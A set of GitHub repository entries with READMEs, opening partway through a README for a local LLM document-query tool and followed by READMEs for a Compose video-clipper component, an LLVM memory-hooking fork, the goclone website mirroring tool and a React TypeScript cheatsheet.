DB: main Using embedded DuckDB with persistence: data will be stored in: ./profiles/main/dbs/main {'model_path': './models/TheBloke_WizardLM-7B-GGML/wizardLM-7B.ggmlv3.q4_1.bin', 'n_ctx': 1000, 'n_batch': 16, 'n_gpu_layers': 20, 'max_tokens': 512} llama.cpp: loading model from ./models/TheBloke_WizardLM-7B-GGML/wizardLM-7B.ggmlv3.q4_1.bin ................ aide: who are the spartans ? Llama.generate: prefix-match hit The Spartans were a group of people from ancient Greece who were known for their military prowess and strict way of life. 
They lived in the city of Sparta and were considered one of the most powerful city-states in Greece during the 5th century BCE. aide: !time 41.41 aide: !docs 1 city of busy trade. Sparta was an armed camp where people were soldiers for the sake of being soldiers. The people of Athens loved to sit in the sun and discuss poetry or listen to the wise words of a philosopher. The Spartans, on the other hand, never wrote a single line that was considered literature, but they knew how to fight, they liked to fight, and they sacrificed all human emotions to their ideal of military preparedness. aide: !source 1 ./profiles/main/src/main/story-of-mankind.txt aide: !mode direct aide: who are the spartans ? The Spartans were a group of ancient Greeks who lived in the city-state of Sparta, located in the southern part of the country. They were known for their toughness and discipline, as well as their rigorous military training and lifestyle. The Spartans played a key role in defending Greece against invading Persian forces in the 5th century BCE, and they were also famous for their political system, which was based on a strict hierarchy of rulers and warriors. Today, the term "Spartan" is often used as a metaphor for strength, discipline, and toughness. aide: !time 19.11 ----- #### Using multiple sources/dbs $ python3 ingest_docs.py --profile main --db test Loading profile : ./profiles/main/profile.toml Profile: main Model: main DB: test Creating new vectorstore Loading documents from ./profiles/main/src/test Loading new documents: 100%|██████████████████████| 4/4 [00:00<00:00, 21.34it/s] Loaded 4 new documents from ./profiles/main/src/test Split into 6326 chunks of text (max. 500 tokens each) Creating embeddings. May take some minutes... ./profiles/main/dbs/test Using embedded DuckDB with persistence: data will be stored in: ./profiles/main/dbs/test Ingestion complete! You can now query your documents $ python3 run_aide.py --profile main --db main Loading profile : .//profiles/main/profile.toml Profile: main Model: main DB: main ................ # switch to qa mode aide: !mode qa aide: what is law ? Law refers to the set of rules and regulations established by the government and enforced by the legal system to govern the behavior of citizens and maintain order in society. aide: !docs 1 The penal statutes form a very small proportion of the sixty-two books of the Code and Pandects; and in all judicial proceedings, the life or death of a citizen is determined with less caution or delay than the most ordinary question of covenant or inheritance. This singular distinction, though something may be allowed for the urgent necessity of defending the peace of society, is derived from the nature of criminal and civil jurisprudence. Our duties to the state are simple and uniform: the aide: !source 1 ./profiles/main/src/main/hist-rome.txt #switch the db to test aide: !switch db test Switching to DB : test Using embedded DuckDB with persistence: data will be stored in: .//profiles/main/dbs/test aide: what is law ? Law is the collective organization of the individual right to lawful defense. aide: !docs 1 What is law? What ought it to be? What is its domain? What are its limits? Where, in fact, does the prerogative of the legislator stop? I have no hesitation in answering, Law is common force organized to prevent injustice;--in short, Law is Justice. It is not true that the legislator has absolute power over our persons and property, since they pre-exist, and his work is only to secure them from injury. 
aide: !source 1 ./profiles/main/src/test/bastiat-the-law.txt #ask in direct mode ... ? toggles the mode aide: ?what is law ? Law is a set of rules and regulations that are established by the government or other authoritative bodies to govern the behavior of individuals and organizations within a particular society. These laws are designed to promote order, justice, and fairness in society, and to protect citizens from harm. Law can be written or unwritten, and can cover a wide range of topics such as contract law, criminal law, tort law, property law, and environmental law ----- #### Using System prompt For now very rudimentary ... probably will extend this functionality. Use {body} to specify where you want to insert your question. aide: !prompt new task You have the following objective "{body}". Create a list of step by step actions to accomplish the goal. Adding new prompt : task aide: !prompt list {'task': {'prompt': 'You have the following objective "{body}". Create a list of step by step actions to accomplish the goal.'}} aide: > task How can I sum two numbers ? Q: You have the following objective "How can I sum two numbers ?". Create a list of step by step actions to accomplish the goal. 1. Check if the user has entered the correct syntax for adding two numbers. 2. Prompt the user to enter the first number they want to add. 3. Prompt the user to enter the second number they want to add. 4. Add the two numbers and display the result to the user. 5. Check if the user wants to enter another number or not. If yes, repeat steps 2-4 until no more numbers are entered. 6. If the user does not want to enter another number, thank them for using the program and exit.
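----- #### How the context is built (conceptual sketch) The context feature (`-c` / `--ctx_pairs`) described earlier boils down to prepending the last few QA pairs to the new question before it is sent to the model. The sketch below is a hypothetical illustration of that idea, not the actual aide source code.

```python
def build_prompt(question, chat_history, ctx_pairs=0):
    """Prepend the last `ctx_pairs` (question, answer) pairs to the new question."""
    pairs = chat_history[-ctx_pairs:] if ctx_pairs > 0 else []
    context = "".join(f"Q: {q}\nA: {a}\n" for q, a in pairs)
    return f"{context}Q: {question}\nA:"

history = [
    ("who are the spartans ?", "A warrior society of ancient Greece."),
    ("what about the athenians ?", "A trading and seafaring city-state."),
]
print(build_prompt("how do the Thebans differ ?", history, ctx_pairs=2))
```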
12
3
realOxy/touchbar
https://github.com/realOxy/touchbar
Touchbar is a Video Clipper component made by Jetpack Compose.
# Compose TouchBar TouchBar is a Video Clipper component made with Jetpack Compose (it only controls the clipper handles and displays video thumbnails). [![API](https://img.shields.io/badge/API-21%2B-brightgreen.svg?style=flat)](https://android-arsenal.com/api?level=21) [![](https://jitpack.io/v/realOxy/touchbar.svg)](https://jitpack.io/#realOxy/touchbar) # Installation Add the JitPack repository to your build file, add it in your root build.gradle at the end of repositories: ```groovy allprojects { repositories { ... maven { url 'https://jitpack.io' } } } ``` Add the dependency ```groovy dependencies { implementation 'com.github.realOxy:touchbar:(insert latest version)' } ``` # Quick Start ```kotlin var duration: Long by remember { mutableStateOf(-1L) } val touchbarState = rememberTouchbarState( enabled = duration >= 0L ) TouchBar( state = touchbarState, // enableZHandle = true, modifier = Modifier.fillMaxWidth() ) // MediaUtils is available in the project app module. // It is an Android platform utility. LaunchedEffect(uri) { // loadThumbs actually returns a Flow, not a List; // see the app module demo for the correct way to use it. val newBitmaps: List<Bitmap?> = MediaUtils.loadThumbs(uri) duration = if (uri == null) -1 else MediaUtils.getDuration(context, uri) MediaUtils.recycleNullableUseless(bitmaps, newBitmaps) bitmaps = newBitmaps if (bitmaps.size == thumbCount) { touchbarState.background?.asAndroidBitmap()?.recycle() touchbarState.notifyBackground( MediaUtils.merge(bitmaps, Orientation.Horizontal)?.asImageBitmap() ) } } // recycle all bitmaps DisposableEffect(Unit) { onDispose { bitmaps.forEach { it?.recycle() } } } ``` # TouchBarState - `enabled: Boolean` whether the handles are enabled. - `x: Float` left handle percentage (0f ~ 1f allowed). - `y: Float` right handle percentage (0f ~ 1f allowed). - `z: Float` mid handle percentage (0f ~ 1f allowed). - `isXFocus: Boolean` whether the left handle is being pressed. - `isYFocus: Boolean` whether the right handle is being pressed. - `isZFocus: Boolean` whether the mid handle is being pressed. - `notify()` changes x, y, z, isXFocus, isYFocus or isZFocus. - `notifyBackground()` changes the background bitmap. # Demo [Video Editor](app/src/main/java/com/oxy/mmr/feature/touchbar/TouchBarScreen.kt) https://github.com/realOxy/touchbar/assets/70512220/35be7389-e5c0-4cf7-9a3f-2df0b348b5ee # Versions - Kotlin 1.9.0 - Jetpack Compose 1.4.3 - Jetpack Compose Material3 1.1.1 - Compose Kotlin Compiler Extension 1.5.0
11
0
remotemcu/adin-llvm
https://github.com/remotemcu/adin-llvm
null
# ADIN LLVM Fork: Memory Operation Hooking [![Ubuntu](https://github.com/remotemcu/adin-llvm/actions/workflows/ubuntu.yml/badge.svg)](https://github.com/remotemcu/adin-llvm/actions/workflows/ubuntu.yml) [![Macos](https://github.com/remotemcu/adin-llvm/actions/workflows/macos.yml/badge.svg)](https://github.com/remotemcu/adin-llvm/actions/workflows/macos.yml) ![GitHub all releases](https://img.shields.io/github/downloads/remotemcu/adin-llvm/total) ![logo](docs/logo.png) 1. [Introduction](#introduction) 2. [Usage](#usage) 3. [How build](#how-build) * [Unix-like OS](#unix-like-os) * [Windows OS](#windows-os) ## Introduction: The **ADIN LLVM Fork** is a specialized version of the LLVM compiler infrastructure that incorporates the [**ADIN code transformer pass**](https://github.com/remotemcu/adin-llvm-pass). This fork enables runtime interrupting technologies by allowing developers to hook memory operations, such as store and load operations, and replace them with custom hook functions. The **ADIN LLVM Fork** is particularly crucial for projects like [**REMCU Library**](https://github.com/remotemcu/remcu) and [**REMCU Chip SDKs**](https://github.com/remotemcu/remcu-chip-sdks), where it is used to hook peripheral register operations. ## Usage: To utilize the memory operation hooking capabilities of the **ADIN LLVM Fork**, you can modify LLVM IR compiled code using the `opt` tool with the `-adin` flag. Here's an example to help you understand the process: Let's assume you have a simple C code file named `example.c`. ```c int var = 0; void f(){ *(int*)0x100 = 1; var = *(int*)0x100; } ``` To compile it into LLVM IR code using Clang, execute the following command: ```shell clang -S -emit-llvm example.c -o example.ll ``` This command will generate the LLVM IR code file `example.ll` based on your C code. ```llvm ; Function Attrs: noinline nounwind optnone uwtable define dso_local void @f() #0 { store i32 1, i32* inttoptr (i64 256 to i32*), align 4 %1 = load i32, i32* inttoptr (i64 256 to i32*), align 4 store i32 %1, i32* @b, align 4 ret void } ``` Now, you can use the **ADIN LLVM Fork** to modify the LLVM IR code and add memory operation hooks. Run the following command: ```shell opt -adin -S example.ll -o adin_modified_example.ll ``` The `-adin` flag indicates that you want to perform memory operation hooking on the input LLVM IR code. The modified LLVM IR code will be written to the `adin_modified_example.ll` file. ```llvm define dso_local void @f() #0 { call void @__adin_store_(i8* inttoptr (i64 256 to i8*), i64 1, i32 32, i32 4) %load_i32_ = call i64 @__adin_load_(i8* inttoptr (i64 256 to i8*), i32 32, i32 4) %truncated_i32_ = trunc i64 %load_i32_ to i32 store i32 %truncated_i32_, i32* @b, align 4 ret void } ``` In the modified LLVM IR code (`adin_modified_example.ll`), the original store and load operations have been replaced with the `__adin_store_` and `__adin_load_` functions. These functions are the hook functions provided by the ADIN LLVM Fork, which allow you to intercept and modify the behavior of memory operations. You can define and implement these hook functions in C/C++ code to perform any desired modifications or additional actions before or after the memory operations. * The `__adin_store_` function will be called instead of a regular store operation, * The `__adin_load_` function will be called instead of a regular load operation. 
To implement the **__adin_store_** and **__adin_load_** hook functions in your C/C++ code for performing desired modifications or additional actions before memory operations, you can follow a similar approach to what is done in the [Address Interceptor Lib]. Here's an example: ```c extern "C" void __adin_store_(llvm_pass_addr pointer, llvm_value_type value, llvm_pass_arg TypeSizeArg, llvm_pass_arg AlignmentArg) { //... } extern "C" llvm_value_type __adin_load_(const llvm_pass_addr pointer, llvm_pass_arg TypeSizeArg, llvm_pass_arg AlignmentArg) { //... } ``` Finally, you can use the LLVM IR code to continue with the compilation process, linking, and generating the final executable or library as needed. Yes, the `opt` utility provided by the ADIN LLVM Fork also allows you to hook `memmove`, `memcpy`, and `memset` operations in addition to store and load operations. You can enable the hooking of these memory operations using specific options provided by `opt`. Here are the options you can use: ``` $ opt --help | grep adin -adin-alloca-address-skip - Skip intercept address on alloca frame (Stack var) -adin-check-normal-address-aligment - Checks normal alignment of address attempt -adin-mem-function-instructions - if equal true - intercept memmove/memcpy/memset function, else skip -adin-name-callback-load=<string> - Set name callback of load operation. Default __adin_load_ -adin-name-callback-memcpy=<string> - Set name callback of memcpy operation. Default __adin_memcpy_ -adin-name-callback-memmove=<string> - Set name callback of memmove operation. Default __adin_memmove_ -adin-name-callback-memset=<string> - Set name callback of memset operation. Default __adin_memset_ -adin-name-callback-store=<string> - Set name callback of store operation. Default __adin_store_ -adin-simple-global-skip - Skip intercept address of SIMPLE global var -adin-skip-unsupported-instructions - if equal true - skip this unsupported instruction, else throw error -adin-verbose-level=<int> - Set Level of verbose for AddressIntercept Pass ``` ## How build ### Unix-like OS **Note:** This part of guide assumes that you have a basic understanding of software development, command-line tools, and are comfortable using a Unix-like operating system such as Linux or macOS. Some commands may need to be modified slightly if you are using a different operating system. #### Prerequisites Before proceeding with the build process, make sure you have the following prerequisites installed on your system: 1. **CMake**: LLVM uses CMake(version 3.5.1 or higher) as its build system. Ensure that you have CMake installed on your system. You can download CMake from the official website: https://cmake.org/download/ 2. **GCC or Clang**: LLVM is primarily written in C++. You will need a C++ compiler to build LLVM. Ensure that you have either GCC or Clang installed on your system. 3. **Git**: You need Git version control system to clone the LLVM Adin Fork repository and manage source code. Install Git by following the instructions on the official website: https://git-scm.com/downloads 4. **Python**: LLVM build system relies on Python. Ensure that Python is installed on your system. You can download Python from the official website: https://www.python.org/downloads/ 5. **Ninja (optional)**: Ninja is an alternative build system to Make. While not mandatory, it can speed up the build process. If you want to use Ninja, install it using your system's package manager. 
The procedure below was tested on Ubuntu 16.04.

#### Building LLVM Adin Fork

Follow the steps below to build your LLVM Adin Fork:

##### Step 1: Clone the Repository

1. Open a terminal or command prompt.
2. Change to the directory where you want to clone the LLVM Adin Fork repository.
3. Clone the repository using the following command:

```
git clone --recurse-submodules https://github.com/remotemcu/adin-llvm
```

##### Step 2: Configure the Build

1. Change to the LLVM Adin Fork directory:

```
cd adin-llvm
```

2. Create a build directory:

```
mkdir build
cd build
```

3. Generate the build files using CMake:

```
cmake .. -DCMAKE_BUILD_TYPE=MinSizeRel -DLLVM_BUILD_RUNTIME=Off -DLLVM_INCLUDE_TESTS=Off -DLLVM_INCLUDE_EXAMPLES=Off -DLLVM_ENABLE_BACKTRACES=Off -DLLVM_TARGETS_TO_BUILD="host" -DLLVM_ENABLE_OCAMLDOC=Off -DLLVM_BUILD_UTILS=Off -DLLVM_BUILD_DOCS=Off
```

CMake picks a default generator for your system; pass `-G <generator>` to choose one explicitly, for example `"Unix Makefiles"` for Make or `"Ninja"` for Ninja.

![ubuntu_cmake.png](docs/ubuntu_cmake.png)

**Note:** If you are using Ninja:

```
cmake -G Ninja .. -DCMAKE_BUILD_TYPE=MinSizeRel -DLLVM_BUILD_RUNTIME=Off -DLLVM_INCLUDE_TESTS=Off -DLLVM_INCLUDE_EXAMPLES=Off -DLLVM_ENABLE_BACKTRACES=Off -DLLVM_TARGETS_TO_BUILD="host" -DLLVM_ENABLE_OCAMLDOC=Off -DLLVM_BUILD_UTILS=Off -DLLVM_BUILD_DOCS=Off
```

##### Step 3: Build LLVM

1. Build LLVM using the generated build files:

```
cmake --build . --config MinSizeRel
```

2. Grab a cup of coffee or tea, as the build process might take some time depending on your system's speed and available resources.
3. Once the build has completed successfully, you can use the ADIN LLVM Fork as desired. The built binaries can be found in the `build/bin` directory.

![opt.PNG](docs/opt-ubuntu.png)

To locate the **opt** utility, which is used for modifying LLVM intermediate representations, follow the steps below:

* Open a file explorer or command prompt.
* Navigate to the `build/bin` directory within your LLVM Adin Fork repository.
* Look for the `opt` executable file. The exact file extension may vary depending on your operating system (e.g., `.exe` for Windows).
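To quickly check that the freshly built `opt` actually contains the ADIN pass, you can run it straight from the build tree and grep for the options listed earlier (run from the `build` directory):

```shell
./bin/opt --help | grep adin
```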
### Windows OS

Note that this guide assumes you are building on a Windows system and requires MSBuild from Visual Studio 2017.

#### Prerequisites

Before proceeding with the LLVM Adin Fork build, ensure that you have the following prerequisites installed on your Windows machine:

1. **MSBuild:** Install Microsoft Build Tools or Visual Studio 2017. You can download Visual Studio 2017 Community Edition from the official Microsoft website: [https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2017/install/use-command-line-parameters-to-install-visual-studio?view=vs-2017](https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2017/install/use-command-line-parameters-to-install-visual-studio?view=vs-2017). Make sure to select the required components (shown below) during the installation.

![vc-components.PNG](docs/vc-components.PNG)

The build was tested with the following toolchain:

```
-- Selecting Windows SDK version 10.0.17763.0 to target Windows 10.0.17134.
-- The C compiler identification is MSVC 19.16.27050.0
-- The CXX compiler identification is MSVC 19.16.27050.0
```

2. **Python:** Install Python on your system. You can download the latest Python version from the official Python website: [https://www.python.org/downloads/windows/](https://www.python.org/downloads/windows/). Choose the appropriate version for your system (64-bit) and follow the installation instructions.

3. **Git:** Install the Git version control system. You can download Git from the official Git website: [https://git-scm.com/downloads](https://git-scm.com/downloads). Choose the appropriate installer for your system and run the installation.

#### Building LLVM Adin Fork

Once you have installed the necessary prerequisites, follow the steps below to build the LLVM Adin Fork:

1. **Clone the LLVM Adin Fork Repository:** Open a command prompt or Git Bash and navigate to the directory where you want to clone the LLVM Adin Fork repository. Then run the following command to clone the repository:

```shell
git clone --recurse-submodules https://github.com/remotemcu/adin-llvm
```

2. **Open a Developer Command Prompt:** From the Start menu, open the "x64 Native Tools Command Prompt for VS 2017" entry.

![start_menu.PNG](docs/start_menu.PNG)

3. **Create a Build Directory:** In the command prompt window, use the `cd` command to navigate to the directory where you will build the LLVM Adin Fork. For example, if the cloned repository is located in `C:\llvm-adin`, create `C:\llvm-adin-build` as the build directory and change into it.

![cmd_cd.PNG](docs/cmd_cd.PNG)

Make sure to replace `C:\llvm-adin` with the actual path to your LLVM Adin Fork repository.

4. **Configure the Build:** Run the following command from the build directory (for example `C:\llvm-adin-build`) to generate the build files using CMake:

```shell
cmake -Thost=x64 C:\llvm-adin -DCMAKE_BUILD_TYPE=MinSizeRel -DLLVM_BUILD_RUNTIME=Off -DLLVM_INCLUDE_TESTS=Off -DLLVM_INCLUDE_EXAMPLES=Off -DLLVM_ENABLE_BACKTRACES=Off -DLLVM_TARGETS_TO_BUILD="host" -DLLVM_ENABLE_OCAMLDOC=Off -DLLVM_BUILD_UTILS=Off -DLLVM_BUILD_DOCS=Off
```

![screenshot cmd](docs/adin-cm-build.PNG)

This command configures the build for the installed Visual Studio toolset (`-Thost=x64` selects the 64-bit host tools). Pass an explicit generator with the `-G` argument if you need to target a different version of Visual Studio.

5. **Build LLVM:** Once the configuration is complete, you can build LLVM by running the following command:

```shell
cmake --build . --config MinSizeRel
```

Once the build has completed successfully, you can use the ADIN LLVM Fork as desired. The built binaries can be found in the `MinSizeRel\bin` directory inside your build directory.

To locate the **opt** utility, which is used for modifying LLVM intermediate representations, follow the steps below:

* Open a file explorer or command prompt.
* Navigate to the `MinSizeRel\bin` directory within your build directory.
* Look for the `opt.exe` executable file.

![screenshot cmd](docs/windows-opt-build.PNG)

---

LLVM is open source software. You may freely distribute it under the terms of the license agreement found in LICENSE.txt.
32
1
shurco/goclone
https://github.com/shurco/goclone
🌱 goclone - clone websites in a matter of seconds
# 🌱 goclone

<a href="https://github.com/shurco/goclone/releases"><img src="https://img.shields.io/github/v/release/shurco/goclone?sort=semver&label=Release&color=651FFF"></a> <a href="https://goreportcard.com/report/github.com/shurco/goclone"><img src="https://goreportcard.com/badge/github.com/shurco/goclone"></a> <a href="https://www.codefactor.io/repository/github/shurco/goclone"><img src="https://www.codefactor.io/repository/github/shurco/goclone/badge" alt="CodeFactor" /></a> <a href="https://github.com/shurco/goclone/actions/workflows/release.yml"><img src="https://github.com/shurco/goclone/actions/workflows/release.yml/badge.svg"></a> <a href="https://github.com/shurco/goclone/blob/master/LICENSE"><img src="https://img.shields.io/badge/License-MIT-yellow.svg"></a>

Goclone is a powerful utility that enables you to effortlessly download entire websites from the Internet and save them to your local directory. With Goclone, you can easily obtain HTML, CSS, JavaScript, images, and other associated files directly from the server and store them on your computer.

One of the standout features of Goclone is its ability to accurately preserve the original website's relative link structure. This means that when you open any page of the "mirrored" website in your browser, you can seamlessly navigate through the site by following links, just as if you were browsing it online.

Goclone gives you offline access to websites, which is convenient for purposes such as research, archiving, or simply enjoying a website without an internet connection. So go ahead, give Goclone a try and experience the freedom of having your favorite websites at your fingertips, even when you're offline!

![Example](/.github/media/example.gif)

<a name="manual"></a>
### Manual

```bash
# go get :)
go get github.com/shurco/goclone

# change to project directory using your GOPATH
cd $GOPATH/src/github.com/shurco/goclone/cmd

# build and install application
go install
```

<a name="examples"></a>
## Examples

```bash
# goclone <url>
goclone https://domain.com
```

<a name="usage"></a>
## Usage

```
Usage:
  goclone <url> [flags]

Flags:
  -b, --browser_endpoint string   chrome headless browser WS endpoint
  -c, --cookie                    if set true, cookies won't send
  -h, --help                      help for goclone
  -o, --open                      automatically open project in default browser
  -p, --proxy_string string       proxy connection string
  -r, --robots                    disable robots.txt checks
  -s, --serve                     serve the generated files using gofiber
  -P, --servePort int             serve port number (default 8088)
  -u, --user_agent string         custom User-Agent (default "goclone")
  -v, --version                   version for goclone
```

See the end of this README for an additional example that combines several of these flags.

## Making JS Rendered Requests

JS-rendered requests can be made using the `-b` flag. For example, start the headless Chrome image:

```bash
docker run -d -p 9222:9222 --rm --name headless-shell chromedp/headless-shell
```

then run goclone:

```bash
goclone -b "ws://localhost:9222" https://domain.com
```
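The flags above can also be combined in a single invocation. A couple of purely illustrative combinations, composed only from the flag descriptions listed under Usage (not taken from the upstream documentation):

```bash
# clone a site, serve the result on port 8080, and open it in the default browser
goclone -s -P 8080 -o https://domain.com

# clone with a custom User-Agent and with robots.txt checks disabled
goclone -u "Mozilla/5.0" -r https://domain.com
```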
30
1
ibnumusyaffa/simple-react-typescript-cheatsheet
https://github.com/ibnumusyaffa/simple-react-typescript-cheatsheet
Simple & Opinionated React x TypeScript Cheatsheet
# Simple React TypeScript Cheatsheet

- [Simple React TypeScript Cheatsheet](#simple-react-typescript-cheatsheet)
  - [Typing props with inline type](#typing-props-with-inline-type)
  - [Typing props with Type](#typing-props-with-type)
  - [Typing props with default value](#typing-props-with-default-value)
  - [Typing props with children](#typing-props-with-children)
  - [Using Native HTML props to React Components](#using-native-html-props-to-react-components)
    - [1. Basic](#1-basic)
    - [2. Combine with your type](#2-combine-with-your-type)
    - [3. Overriding Native Props](#3-overriding-native-props)
    - [4. Extracting Props from Custom Components](#4-extracting-props-from-custom-components)
  - [Typing Event Handlers from native element](#typing-event-handlers-from-native-element)
  - [useState](#usestate)
  - [useCallback](#usecallback)
  - [useRef](#useref)
    - [Basic useRef](#basic-useref)
    - [useRef with HTML element](#useref-with-html-element)
    - [useRef with forwardRef](#useref-with-forwardref)
    - [Making a Read-Only Ref Mutable](#making-a-read-only-ref-mutable)
  - [useReducer](#usereducer)
  - [Context](#context)
  - [Polymorphic](#polymorphic)
  - [Types or Interfaces?](#types-or-interfaces)
  - [Resources](#resources)

## Typing props with inline type

```tsx
function Button(props: { children: React.ReactNode }) {
  return <button>{props.children}</button>;
}
```

## Typing props with Type

```tsx
// you can use an interface too
type ButtonProps = {
  className: string;
  children: React.ReactNode;
};

function Button(props: ButtonProps) {
  return <button className={props.className}>{props.children}</button>;
}

// with destructuring
function OtherButton({ className, ...props }: ButtonProps) {
  return <button className={className}>{props.children}</button>;
}
```

## Typing props with default value

```tsx
type ButtonProps = {
  disabled?: boolean;
  className: string;
  children: React.ReactNode;
};

function Button({ disabled = true, ...props }: ButtonProps) {
  return (
    <button disabled={disabled} {...props}>
      {props.children}
    </button>
  );
}
```

## Typing props with children

```tsx
type ButtonProps = {
  // accept everything React can render
  children: React.ReactNode;
};

function Button(props: ButtonProps) {
  return <button>{props.children}</button>;
}
```

## Using Native HTML props to React Components

### 1. Basic

```tsx
import React, { ComponentProps } from "react";

// ComponentProps<"button">: get all props from the native button element
function Button(props: ComponentProps<"button">) {
  return <button>{props.children}</button>;
}
```

### 2. Combine with your type

```tsx
import React, { ComponentProps } from "react";

type ButtonProps = ComponentProps<"button"> & {
  variant: "primary" | "secondary";
};

function Button(props: ButtonProps) {
  return <button {...props}>{props.children}</button>;
}
```

### 3. Overriding Native Props

```tsx
import React, { ComponentProps } from "react";

// remove the native onChange prop from input with Omit<Type, Keys> and combine with a new type
type InputProps = Omit<ComponentProps<"input">, "onChange"> & {
  onChange: (value: string) => void;
};

function Input({ onChange, ...props }: InputProps) {
  // adapt the native change event to the simpler (value: string) => void signature
  return <input {...props} onChange={(e) => onChange(e.target.value)} />;
}
```
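As a quick usage sketch (the `SearchBox` wrapper is hypothetical), callers of the overridden component now receive the input's string value directly instead of a `ChangeEvent`:

```tsx
function SearchBox() {
  return <Input onChange={(value) => console.log(value.toUpperCase())} />;
}
```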
### 4. Extracting Props from Custom Components

Useful when the author of an external library doesn't export the type definition.

```tsx
import { ComponentProps } from "react";
import { Navbar } from "some-ui-library";

type NavbarProps = ComponentProps<typeof Navbar>;
```

## Typing Event Handlers from native element

Hover over the native HTML prop in VS Code and you can copy-paste the type definition.

```tsx
type ButtonProps = {
  other?: boolean;
  onClick?: React.MouseEventHandler<HTMLButtonElement>;
};
```

![event handler](event-handler.png "event handler")

## useState

```tsx
// ❌ TypeScript already knows `text` is a string
const [text, setText] = useState<string>("");

// ✅ no need to tell TypeScript; this only works with primitive values
const [text, setText] = useState("");
```

```tsx
type Tag = {
  id: number;
  value: string;
};

const [tags, setTags] = useState<Tag[]>([]);
```

```tsx
// data : Data | undefined
const [data, setData] = useState<Data>();

// data : Data | undefined
const [data, setData] = useState<Data>(undefined);

// data : Data | null
const [data, setData] = useState<Data | null>(null);
```

## useCallback

```tsx
import { useCallback } from "react";

function App(props: { id: number }) {
  const handleClick = useCallback(
    //⬇️ add type here
    (message: string) => {
      console.log(message);
    },
    [props.id]
  );

  return (
    <div>
      <button onClick={() => handleClick("hello")}>button 1</button>
      <button onClick={() => handleClick("hello")}>button 2</button>
    </div>
  );
}
```

## useRef

### Basic useRef

```tsx
import { useEffect, useRef } from "react";

export const Component = () => {
  // pass a type if there is no initial value
  const id1 = useRef<string>();

  // no need to pass a type if there is an initial value
  const id2 = useRef("");

  useEffect(() => {
    id1.current = "Random value!";
  }, []);

  return <div></div>;
};
```

### useRef with HTML element

You can hover over the type of `ref` on the element to check what it accepts in your editor.

```tsx
export const Component1 = () => {
  // add null as the initial value
  const ref = useRef<HTMLAudioElement>(null);

  // (property) React.ClassAttributes<HTMLAudioElement>.ref?: React.LegacyRef<HTMLAudioElement> | undefined
  return <audio ref={ref} />;
};
```

Alternative using the `ElementRef` type helper:

```tsx
import { useRef, ElementRef } from "react";
import { OtherComponent } from "./other-component";

// the easy alternative: use ElementRef
const Component1 = () => {
  const audioRef = useRef<ElementRef<"audio">>(null);

  return <audio ref={audioRef}>Hello</audio>;
};

// ElementRef works for components too
type OtherComponentRef = ElementRef<typeof OtherComponent>;

const Component2 = () => {
  const ref = useRef<OtherComponentRef>(null);

  return <OtherComponent ref={ref}>Hello</OtherComponent>;
};
```

### useRef with forwardRef

```tsx
import React, { useEffect } from "react";

type InputProps = {
  className: string;
};

const MyInput = React.forwardRef<HTMLInputElement, InputProps>((props, ref) => {
  return <input ref={ref} className={props.className} />;
});

// add a displayName if you are using a function expression, so it has a name in React DevTools
MyInput.displayName = "MyInput";

function App() {
  const input = React.useRef<HTMLInputElement>(null);

  useEffect(() => {
    // focus the input element on first render
    if (input.current) {
      input.current.focus();
    }
  }, []);

  return <MyInput className="input-style" ref={input} />;
}
```

### Making a Read-Only Ref Mutable

```tsx
export const Component = () => {
  const ref1 = useRef<string>(null);
  // ❌ if you pass null as the initial value, the ref is read-only,
  // so assigning to `current` directly is a type error
  ref1.current = "Hello";

  const ref2 = useRef<string>();
  // ✅ if the initial value is undefined, the ref is mutable
  ref2.current = "Hello";

  return null;
};
```
## useReducer

You can use [Discriminated Unions](https://www.totaltypescript.com/discriminated-unions-are-a-devs-best-friend) for reducer actions. Don't forget to define the return type of the reducer; otherwise TypeScript will infer it, which can hide mistakes in individual branches.

```tsx
import { useReducer } from "react";

const initialState = { count: 0 };

type ACTIONTYPE =
  | { type: "increment"; payload: number }
  | { type: "decrement"; payload: string };

function reducer(state: typeof initialState, action: ACTIONTYPE): typeof initialState {
  switch (action.type) {
    case "increment":
      return { count: state.count + action.payload };
    case "decrement":
      return { count: state.count - Number(action.payload) };
    default:
      throw new Error();
  }
}

function Counter() {
  const [state, dispatch] = useReducer(reducer, initialState);
  return (
    <>
      Count: {state.count}
      <button onClick={() => dispatch({ type: "decrement", payload: "5" })}>
        -
      </button>
      <button onClick={() => dispatch({ type: "increment", payload: 5 })}>
        +
      </button>
    </>
  );
}
```

## Context

```tsx
import { createContext, useContext, useState } from "react";

type ThemeContextType = "light" | "dark";

const ThemeContext = createContext<ThemeContextType | null>(null);
// if you have a proper default value, you don't need to allow null:
// const ThemeContext = createContext<ThemeContextType>("light");

const useTheme = () => {
  const theme = useContext(ThemeContext);
  if (!theme) {
    throw new Error(
      "useTheme has to be used within <ThemeContext.Provider>"
    );
  }
  return theme;
};

const App = () => {
  const [theme, setTheme] = useState<ThemeContextType>("light");

  return (
    <ThemeContext.Provider value={theme}>
      <SomeComponent />
    </ThemeContext.Provider>
  );
};

const SomeComponent = () => {
  // since the value has been checked inside useTheme, there is no need to check for null here
  const theme = useTheme();

  return <p>current theme: {theme}.</p>;
};
```

## Polymorphic

Imagine a `Button` component that renders a `<button>` element, but with your fancy button styles. If we want to render the Button component as an `<a>` element instead, we might have an API like:

```tsx
<Button variantColor="primary" href="https://blog.makerx.com.au/" as="a">
  Click me
</Button>
```

This looks nice, but it doesn't work really well with TypeScript. Here is an alternative using `@radix-ui/react-slot`:

```tsx
// Button.tsx
import * as React from 'react'
import { Slot } from '@radix-ui/react-slot'
import clsx from 'clsx'

type ButtonProps = React.ComponentPropsWithoutRef<'button'> & {
  variantColor: 'primary' | 'secondary' | 'danger'
  asChild?: boolean
}

export const Button = React.forwardRef<HTMLButtonElement, ButtonProps>((props, forwardedRef) => {
  const { variantColor, asChild, ...buttonProps } = props
  const Component = (asChild ? Slot : 'button') as 'button'
  return (
    <Component
      {...buttonProps}
      ref={forwardedRef}
      className={clsx(
        // ...
      )}
    />
  )
})

// App.tsx
function App() {
  return (
    <div>
      {/* asChild must be true */}
      <Button variantColor="primary" asChild>
        {/* render the Button component as a link */}
        <a href="https://google.com">About</a>
      </Button>
    </div>
  )
}
```

## Types or Interfaces?

`interface`s are different from `type`s in TypeScript, but they can be used for very similar things as far as common React use cases are concerned. Here's a helpful rule of thumb:

- Always use `interface` for public API definitions when authoring a library or 3rd-party ambient type definitions.
- Consider using `type` for your React Component Props and State, because it is more constrained. Types are useful for union types (e.g.
`type MyType = TypeA | TypeB`) whereas interfaces are better for declaring dictionary shapes and then `implementing` or `extending` them.

## Resources

